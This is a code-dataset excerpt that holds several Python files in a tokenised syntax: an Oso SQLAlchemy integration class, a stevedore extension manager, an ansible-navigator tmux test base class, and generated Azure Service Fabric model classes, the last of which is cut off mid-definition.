content
stringlengths
0
1.55M
<import_from_stmt>oso Oso<import_from_stmt>.auth register_models<class_stmt>SQLAlchemyOso(Oso)<block_start>"""The central object to manage application policy state, e.g. the policy data, and verify requests when using Oso with SQLAlchemy. Supports SQLAlchemy-specific functionality, including data filtering. Accepts a SQLAlchemy declarative_base on initialization, which is used to register all relevant SQLAlchemy models with Oso. >>> from sqlalchemy_oso import SQLAlchemyOso >>> from sqlalchemy.ext.declarative import declarative_base >>> Base = declarative_base(name="MyBaseModel") >>> SQLAlchemyOso(Base) <sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...> """<def_stmt>__init__ self sqlalchemy_base<block_start>super().__init__()<line_sep># Register all sqlalchemy models on sqlalchemy_base register_models(self sqlalchemy_base)<line_sep>self.base=sqlalchemy_base<block_end><block_end>
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_stmt>logging<import_from_stmt>.extension ExtensionManager<line_sep>LOG=logging.getLogger(__name__)<class_stmt>EnabledExtensionManager(ExtensionManager)<block_start>"""Loads only plugins that pass a check function. The check_func argument should return a boolean, with ``True`` indicating that the extension should be loaded and made available and ``False`` indicating that the extension should be ignored. :param namespace: The namespace for the entry points. :type namespace: str :param check_func: Function to determine which extensions to load. :type check_func: callable, taking an :class:`Extension` instance as argument :param invoke_on_load: Boolean controlling whether to invoke the object returned by the entry point after the driver is loaded. :type invoke_on_load: bool :param invoke_args: Positional arguments to pass when invoking the object returned by the entry point. Only used if invoke_on_load is True. :type invoke_args: tuple :param invoke_kwds: Named arguments to pass when invoking the object returned by the entry point. Only used if invoke_on_load is True. :type invoke_kwds: dict :param propagate_map_exceptions: Boolean controlling whether exceptions are propagated up through the map call or whether they are logged and then ignored :type propagate_map_exceptions: bool :param on_load_failure_callback: Callback function that will be called when an entrypoint can not be loaded. The arguments that will be provided when this is called (when an entrypoint fails to load) are (manager, entrypoint, exception) :type on_load_failure_callback: function :param verify_requirements: Use setuptools to enforce the dependencies of the plugin(s) being loaded. Defaults to False. :type verify_requirements: bool """<def_stmt>__init__ self namespace check_func invoke_on_load=<false> invoke_args=() invoke_kwds={} propagate_map_exceptions=<false> on_load_failure_callback=<none> verify_requirements=<false> <block_start>self.check_func=check_func<line_sep>super(EnabledExtensionManager self).__init__(namespace invoke_on_load=invoke_on_load invoke_args=invoke_args invoke_kwds=invoke_kwds propagate_map_exceptions=propagate_map_exceptions on_load_failure_callback=on_load_failure_callback verify_requirements=verify_requirements )<block_end><def_stmt>_load_one_plugin self ep invoke_on_load invoke_args invoke_kwds verify_requirements<block_start>ext=super(EnabledExtensionManager self)._load_one_plugin(ep invoke_on_load invoke_args invoke_kwds verify_requirements )<if_stmt>ext<and><not>self.check_func(ext)<block_start>LOG.debug('ignoring extension %r' ep.name)<line_sep><return><none><block_end><return>ext<block_end><block_end>
"""Base class for run interactive/stdout tests. """<import_stmt>difflib<import_stmt>json<import_stmt>os<import_from_stmt>typing Optional<import_stmt>pytest<import_from_stmt>..._interactions SearchFor<import_from_stmt>..._interactions Step<import_from_stmt>....defaults FIXTURES_DIR<import_from_stmt>..._common fixture_path_from_request<import_from_stmt>..._common update_fixtures<import_from_stmt>..._tmux_session TmuxSession<line_sep># run playbook run_fixture_dir=os.path.join(FIXTURES_DIR "integration" "actions" "run")<line_sep>inventory_path=os.path.join(run_fixture_dir "inventory")<line_sep>playbook_path=os.path.join(run_fixture_dir "site.yaml")<line_sep>base_steps=(Step(user_input=":0" comment="play-1 details") Step(user_input=":0" comment="task-1 details") Step(user_input=":back" comment="play-1 details") Step(user_input=":1" comment="play-1 task-2 details") Step(user_input=":back" comment="play-1 details") Step(user_input=":back" comment="all play details") Step(user_input=":1" comment="play-2 details") Step(user_input=":0" comment="play-2 task-1 details") Step(user_input=":back" comment="play-2 details") Step(user_input=":1" comment="play-2 task-2 details") Step(user_input=":back" comment="play-2 details") Step(user_input=":back" comment="all play details") Step(user_input=":st" comment="display stream") )<class_stmt>BaseClass<block_start>"""Base class for run interactive/stdout tests."""<line_sep>UPDATE_FIXTURES=<false><line_sep>TEST_FOR_MODE:Optional[str]=<none><line_sep>@staticmethod@pytest.fixture(scope="module" name="tmux_session")<def_stmt>fixture_tmux_session request<block_start>"""tmux fixture for this module"""<line_sep>params={"pane_height":"1000" "pane_width":"500" "setup_commands":["export ANSIBLE_DEVEL_WARNING=False" "export ANSIBLE_DEPRECATION_WARNINGS=False" ] "unique_test_id":request.node.nodeid }<with_stmt>TmuxSession(**params)<as>tmux_session<block_start><yield>tmux_session<block_end><block_end><def_stmt>test self request tmux_session step# pylint: disable=too-many-branches # pylint: disable=too-many-locals <block_start>"""Run the tests for run, mode and ``ee`` set in child class."""<if_stmt>step.search_within_response<is>SearchFor.HELP<block_start>search_within_response=":help help"<block_end><elif_stmt>step.search_within_response<is>SearchFor.PROMPT<block_start>search_within_response=tmux_session.cli_prompt<block_end><else_stmt><block_start>search_within_response=step.search_within_response<block_end>received_output=tmux_session.interaction(value=step.user_input search_within_response=search_within_response )<if_stmt>step.mask# mask out some configuration that is subject to change each run <block_start>mask="X"<times>50<for_stmt>idx,line enumerate(received_output)<block_start><if_stmt>tmux_session.cli_prompt<in>line<block_start>received_output[idx]=mask<block_end><else_stmt><block_start><for_stmt>out ["duration:" "playbook:" "start:" "end:" "task_path:"]<block_start><if_stmt>out<in>line<block_start>received_output[idx]=mask<block_end><block_end><block_end><block_end><block_end>fixtures_update_requested=(self.UPDATE_FIXTURES<or>os.environ.get("ANSIBLE_NAVIGATOR_UPDATE_TEST_FIXTURES")<eq>"true"<and><not>any((step.look_fors step.look_nots)))<if_stmt>fixtures_update_requested<block_start>update_fixtures(request step.step_index received_output step.comment additional_information={"look_fors":step.look_fors "look_nots":step.look_nots "compared_fixture":<not>any((step.look_fors step.look_nots)) } )<block_end>page=" ".join(received_output)<if_stmt>step.look_fors<block_start><assert_stmt>all(look_for<in>page<for>look_for step.look_fors)<block_end><if_stmt>step.look_nots<block_start><assert_stmt><not>any(look_not<in>page<for>look_not step.look_nots)<block_end><if_stmt><not>any((step.look_fors step.look_nots))<block_start>dir_path,file_name=fixture_path_from_request(request step.step_index)<with_stmt>open(file=os.path.join(dir_path file_name) encoding="utf-8")<as>infile<block_start>expected_output=json.load(infile)["output"]<block_end><assert_stmt>expected_output<eq>received_output "\n"+"\n".join(difflib.unified_diff(expected_output received_output "expected" "received"))<block_end><block_end><block_end>
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- <import_from_stmt>azure.core.exceptions HttpResponseError<import_stmt>msrest.serialization<class_stmt>ApplicationDeltaHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a delta health policy used to evaluate the health of an application or one of its child entities when upgrading the cluster. :param default_service_type_delta_health_policy: The delta health policy used by default to evaluate the health of a service type when upgrading the cluster. :type default_service_type_delta_health_policy: ~azure.mgmt.servicefabric.models.ServiceTypeDeltaHealthPolicy :param service_type_delta_health_policies: The map with service type delta health policy per service type name. The map is empty by default. :type service_type_delta_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ServiceTypeDeltaHealthPolicy] """<line_sep>_attribute_map={'default_service_type_delta_health_policy':{'key':'defaultServiceTypeDeltaHealthPolicy' 'type':'ServiceTypeDeltaHealthPolicy'} 'service_type_delta_health_policies':{'key':'serviceTypeDeltaHealthPolicies' 'type':'{ServiceTypeDeltaHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationDeltaHealthPolicy self).__init__(**kwargs)<line_sep>self.default_service_type_delta_health_policy=kwargs.get('default_service_type_delta_health_policy' <none>)<line_sep>self.service_type_delta_health_policies=kwargs.get('service_type_delta_health_policies' <none>)<block_end><block_end><class_stmt>ApplicationHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a health policy used to evaluate the health of an application or one of its children entities. :param default_service_type_health_policy: The health policy used by default to evaluate the health of a service type. :type default_service_type_health_policy: ~azure.mgmt.servicefabric.models.ServiceTypeHealthPolicy :param service_type_health_policies: The map with service type health policy per service type name. The map is empty by default. :type service_type_health_policies: dict[str, ~azure.mgmt.servicefabric.models.ServiceTypeHealthPolicy] """<line_sep>_attribute_map={'default_service_type_health_policy':{'key':'defaultServiceTypeHealthPolicy' 'type':'ServiceTypeHealthPolicy'} 'service_type_health_policies':{'key':'serviceTypeHealthPolicies' 'type':'{ServiceTypeHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationHealthPolicy self).__init__(**kwargs)<line_sep>self.default_service_type_health_policy=kwargs.get('default_service_type_health_policy' <none>)<line_sep>self.service_type_health_policies=kwargs.get('service_type_health_policies' <none>)<block_end><block_end><class_stmt>ApplicationMetricDescription(msrest.serialization.Model)<block_start>"""Describes capacity information for a custom resource balancing metric. This can be used to limit the total consumption of this metric by the services of this application. :param name: The name of the metric. :type name: str :param maximum_capacity: The maximum node capacity for Service Fabric application. This is the maximum Load for an instance of this application on a single node. Even if the capacity of node is greater than this value, Service Fabric will limit the total load of services within the application on each node to this value. If set to zero, capacity for this metric is unlimited on each node. When creating a new application with application capacity defined, the product of MaximumNodes and this value must always be smaller than or equal to TotalApplicationCapacity. When updating existing application with application capacity, the product of MaximumNodes and this value must always be smaller than or equal to TotalApplicationCapacity. :type maximum_capacity: long :param reservation_capacity: The node reservation capacity for Service Fabric application. This is the amount of load which is reserved on nodes which have instances of this application. If MinimumNodes is specified, then the product of these values will be the capacity reserved in the cluster for the application. If set to zero, no capacity is reserved for this metric. When setting application capacity or when updating application capacity; this value must be smaller than or equal to MaximumCapacity for each metric. :type reservation_capacity: long :param total_application_capacity: The total metric capacity for Service Fabric application. This is the total metric capacity for this application in the cluster. Service Fabric will try to limit the sum of loads of services within the application to this value. When creating a new application with application capacity defined, the product of MaximumNodes and MaximumCapacity must always be smaller than or equal to this value. :type total_application_capacity: long """<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'maximum_capacity':{'key':'maximumCapacity' 'type':'long'} 'reservation_capacity':{'key':'reservationCapacity' 'type':'long'} 'total_application_capacity':{'key':'totalApplicationCapacity' 'type':'long'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationMetricDescription self).__init__(**kwargs)<line_sep>self.name=kwargs.get('name' <none>)<line_sep>self.maximum_capacity=kwargs.get('maximum_capacity' <none>)<line_sep>self.reservation_capacity=kwargs.get('reservation_capacity' <none>)<line_sep>self.total_application_capacity=kwargs.get('total_application_capacity' <none>)<block_end><block_end><class_stmt>ProxyResource(msrest.serialization.Model)<block_start>"""The resource model definition for proxy-only resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} }<def_stmt>__init__ self **kwargs<block_start>super(ProxyResource self).__init__(**kwargs)<line_sep>self.id=<none><line_sep>self.name=<none><line_sep>self.type=<none><line_sep>self.location=kwargs.get('location' <none>)<line_sep>self.tags=kwargs.get('tags' <none>)<line_sep>self.etag=<none><line_sep>self.system_data=<none><block_end><block_end><class_stmt>ApplicationResource(ProxyResource)<block_start>"""The application resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param identity: Describes the managed identities for an Azure resource. :type identity: ~azure.mgmt.servicefabric.models.ManagedIdentity :param type_version: The version of the application type as defined in the application manifest. :type type_version: str :param parameters: List of application parameters with overridden values from their default values specified in the application manifest. :type parameters: dict[str, str] :param upgrade_policy: Describes the policy for a monitored application upgrade. :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. If this property is set to zero, no capacity will be reserved. The value of this property cannot be more than the value of the MaximumNodes property. :type minimum_nodes: long :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. By default, the value of this property is zero and it means that the services can be placed on any node. :type maximum_nodes: long :param remove_application_capacity: Remove the current application capacity settings. :type remove_application_capacity: bool :param metrics: List of application capacity metric description. :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription] :param managed_identities: List of user assigned identities for the application, each mapped to a friendly name. :type managed_identities: list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity] :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param type_name: The application type name as defined in the application manifest. :type type_name: str """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'minimum_nodes':{'minimum':0} 'maximum_nodes':{'minimum':0} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'identity':{'key':'identity' 'type':'ManagedIdentity'} 'type_version':{'key':'properties.typeVersion' 'type':'str'} 'parameters':{'key':'properties.parameters' 'type':'{str}'} 'upgrade_policy':{'key':'properties.upgradePolicy' 'type':'ApplicationUpgradePolicy'} 'minimum_nodes':{'key':'properties.minimumNodes' 'type':'long'} 'maximum_nodes':{'key':'properties.maximumNodes' 'type':'long'} 'remove_application_capacity':{'key':'properties.removeApplicationCapacity' 'type':'bool'} 'metrics':{'key':'properties.metrics' 'type':'[ApplicationMetricDescription]'} 'managed_identities':{'key':'properties.managedIdentities' 'type':'[ApplicationUserAssignedIdentity]'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'type_name':{'key':'properties.typeName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationResource self).__init__(**kwargs)<line_sep>self.identity=kwargs.get('identity' <none>)<line_sep>self.type_version=kwargs.get('type_version' <none>)<line_sep>self.parameters=kwargs.get('parameters' <none>)<line_sep>self.upgrade_policy=kwargs.get('upgrade_policy' <none>)<line_sep>self.minimum_nodes=kwargs.get('minimum_nodes' <none>)<line_sep>self.maximum_nodes=kwargs.get('maximum_nodes' 0)<line_sep>self.remove_application_capacity=kwargs.get('remove_application_capacity' <none>)<line_sep>self.metrics=kwargs.get('metrics' <none>)<line_sep>self.managed_identities=kwargs.get('managed_identities' <none>)<line_sep>self.provisioning_state=<none><line_sep>self.type_name=kwargs.get('type_name' <none>)<block_end><block_end><class_stmt>ApplicationResourceList(msrest.serialization.Model)<block_start>"""The list of application resources. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ApplicationResource] :ivar next_link: URL to get the next set of application list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ApplicationResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ApplicationResourceUpdateProperties(msrest.serialization.Model)<block_start>"""The application resource properties for patch operations. :param type_version: The version of the application type as defined in the application manifest. :type type_version: str :param parameters: List of application parameters with overridden values from their default values specified in the application manifest. :type parameters: dict[str, str] :param upgrade_policy: Describes the policy for a monitored application upgrade. :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. If this property is set to zero, no capacity will be reserved. The value of this property cannot be more than the value of the MaximumNodes property. :type minimum_nodes: long :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. By default, the value of this property is zero and it means that the services can be placed on any node. :type maximum_nodes: long :param remove_application_capacity: Remove the current application capacity settings. :type remove_application_capacity: bool :param metrics: List of application capacity metric description. :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription] :param managed_identities: List of user assigned identities for the application, each mapped to a friendly name. :type managed_identities: list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity] """<line_sep>_validation={'minimum_nodes':{'minimum':0} 'maximum_nodes':{'minimum':0} }<line_sep>_attribute_map={'type_version':{'key':'typeVersion' 'type':'str'} 'parameters':{'key':'parameters' 'type':'{str}'} 'upgrade_policy':{'key':'upgradePolicy' 'type':'ApplicationUpgradePolicy'} 'minimum_nodes':{'key':'minimumNodes' 'type':'long'} 'maximum_nodes':{'key':'maximumNodes' 'type':'long'} 'remove_application_capacity':{'key':'removeApplicationCapacity' 'type':'bool'} 'metrics':{'key':'metrics' 'type':'[ApplicationMetricDescription]'} 'managed_identities':{'key':'managedIdentities' 'type':'[ApplicationUserAssignedIdentity]'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationResourceUpdateProperties self).__init__(**kwargs)<line_sep>self.type_version=kwargs.get('type_version' <none>)<line_sep>self.parameters=kwargs.get('parameters' <none>)<line_sep>self.upgrade_policy=kwargs.get('upgrade_policy' <none>)<line_sep>self.minimum_nodes=kwargs.get('minimum_nodes' <none>)<line_sep>self.maximum_nodes=kwargs.get('maximum_nodes' 0)<line_sep>self.remove_application_capacity=kwargs.get('remove_application_capacity' <none>)<line_sep>self.metrics=kwargs.get('metrics' <none>)<line_sep>self.managed_identities=kwargs.get('managed_identities' <none>)<block_end><block_end><class_stmt>ApplicationResourceProperties(ApplicationResourceUpdateProperties)<block_start>"""The application resource properties. Variables are only populated by the server, and will be ignored when sending a request. :param type_version: The version of the application type as defined in the application manifest. :type type_version: str :param parameters: List of application parameters with overridden values from their default values specified in the application manifest. :type parameters: dict[str, str] :param upgrade_policy: Describes the policy for a monitored application upgrade. :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. If this property is set to zero, no capacity will be reserved. The value of this property cannot be more than the value of the MaximumNodes property. :type minimum_nodes: long :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. By default, the value of this property is zero and it means that the services can be placed on any node. :type maximum_nodes: long :param remove_application_capacity: Remove the current application capacity settings. :type remove_application_capacity: bool :param metrics: List of application capacity metric description. :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription] :param managed_identities: List of user assigned identities for the application, each mapped to a friendly name. :type managed_identities: list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity] :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param type_name: The application type name as defined in the application manifest. :type type_name: str """<line_sep>_validation={'minimum_nodes':{'minimum':0} 'maximum_nodes':{'minimum':0} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'type_version':{'key':'typeVersion' 'type':'str'} 'parameters':{'key':'parameters' 'type':'{str}'} 'upgrade_policy':{'key':'upgradePolicy' 'type':'ApplicationUpgradePolicy'} 'minimum_nodes':{'key':'minimumNodes' 'type':'long'} 'maximum_nodes':{'key':'maximumNodes' 'type':'long'} 'remove_application_capacity':{'key':'removeApplicationCapacity' 'type':'bool'} 'metrics':{'key':'metrics' 'type':'[ApplicationMetricDescription]'} 'managed_identities':{'key':'managedIdentities' 'type':'[ApplicationUserAssignedIdentity]'} 'provisioning_state':{'key':'provisioningState' 'type':'str'} 'type_name':{'key':'typeName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationResourceProperties self).__init__(**kwargs)<line_sep>self.provisioning_state=<none><line_sep>self.type_name=kwargs.get('type_name' <none>)<block_end><block_end><class_stmt>ApplicationResourceUpdate(ProxyResource)<block_start>"""The application resource for patch operations. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param type_version: The version of the application type as defined in the application manifest. :type type_version: str :param parameters: List of application parameters with overridden values from their default values specified in the application manifest. :type parameters: dict[str, str] :param upgrade_policy: Describes the policy for a monitored application upgrade. :type upgrade_policy: ~azure.mgmt.servicefabric.models.ApplicationUpgradePolicy :param minimum_nodes: The minimum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. If this property is set to zero, no capacity will be reserved. The value of this property cannot be more than the value of the MaximumNodes property. :type minimum_nodes: long :param maximum_nodes: The maximum number of nodes where Service Fabric will reserve capacity for this application. Note that this does not mean that the services of this application will be placed on all of those nodes. By default, the value of this property is zero and it means that the services can be placed on any node. :type maximum_nodes: long :param remove_application_capacity: Remove the current application capacity settings. :type remove_application_capacity: bool :param metrics: List of application capacity metric description. :type metrics: list[~azure.mgmt.servicefabric.models.ApplicationMetricDescription] :param managed_identities: List of user assigned identities for the application, each mapped to a friendly name. :type managed_identities: list[~azure.mgmt.servicefabric.models.ApplicationUserAssignedIdentity] """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'minimum_nodes':{'minimum':0} 'maximum_nodes':{'minimum':0} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'type_version':{'key':'properties.typeVersion' 'type':'str'} 'parameters':{'key':'properties.parameters' 'type':'{str}'} 'upgrade_policy':{'key':'properties.upgradePolicy' 'type':'ApplicationUpgradePolicy'} 'minimum_nodes':{'key':'properties.minimumNodes' 'type':'long'} 'maximum_nodes':{'key':'properties.maximumNodes' 'type':'long'} 'remove_application_capacity':{'key':'properties.removeApplicationCapacity' 'type':'bool'} 'metrics':{'key':'properties.metrics' 'type':'[ApplicationMetricDescription]'} 'managed_identities':{'key':'properties.managedIdentities' 'type':'[ApplicationUserAssignedIdentity]'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationResourceUpdate self).__init__(**kwargs)<line_sep>self.type_version=kwargs.get('type_version' <none>)<line_sep>self.parameters=kwargs.get('parameters' <none>)<line_sep>self.upgrade_policy=kwargs.get('upgrade_policy' <none>)<line_sep>self.minimum_nodes=kwargs.get('minimum_nodes' <none>)<line_sep>self.maximum_nodes=kwargs.get('maximum_nodes' 0)<line_sep>self.remove_application_capacity=kwargs.get('remove_application_capacity' <none>)<line_sep>self.metrics=kwargs.get('metrics' <none>)<line_sep>self.managed_identities=kwargs.get('managed_identities' <none>)<block_end><block_end><class_stmt>ApplicationTypeResource(ProxyResource)<block_start>"""The application type name resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeResource self).__init__(**kwargs)<line_sep>self.provisioning_state=<none><block_end><block_end><class_stmt>ApplicationTypeResourceList(msrest.serialization.Model)<block_start>"""The list of application type names. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ApplicationTypeResource] :ivar next_link: URL to get the next set of application type list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ApplicationTypeResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ApplicationTypeVersionResource(ProxyResource)<block_start>"""An application type version resource for the specified application type name resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param app_package_url: The URL to the application package. :type app_package_url: str :ivar default_parameter_list: List of application type parameters that can be overridden when creating or updating the application. :vartype default_parameter_list: dict[str, str] """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} 'default_parameter_list':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'app_package_url':{'key':'properties.appPackageUrl' 'type':'str'} 'default_parameter_list':{'key':'properties.defaultParameterList' 'type':'{str}'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionResource self).__init__(**kwargs)<line_sep>self.provisioning_state=<none><line_sep>self.app_package_url=kwargs.get('app_package_url' <none>)<line_sep>self.default_parameter_list=<none><block_end><block_end><class_stmt>ApplicationTypeVersionResourceList(msrest.serialization.Model)<block_start>"""The list of application type version resources for the specified application type name resource. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ApplicationTypeVersionResource] :ivar next_link: URL to get the next set of application type version list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ApplicationTypeVersionResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ApplicationTypeVersionsCleanupPolicy(msrest.serialization.Model)<block_start>"""ApplicationTypeVersionsCleanupPolicy. All required parameters must be populated in order to send to Azure. :param max_unused_versions_to_keep: Required. Number of unused versions per application type to keep. :type max_unused_versions_to_keep: long """<line_sep>_validation={'max_unused_versions_to_keep':{'required':<true> 'minimum':0} }<line_sep>_attribute_map={'max_unused_versions_to_keep':{'key':'maxUnusedVersionsToKeep' 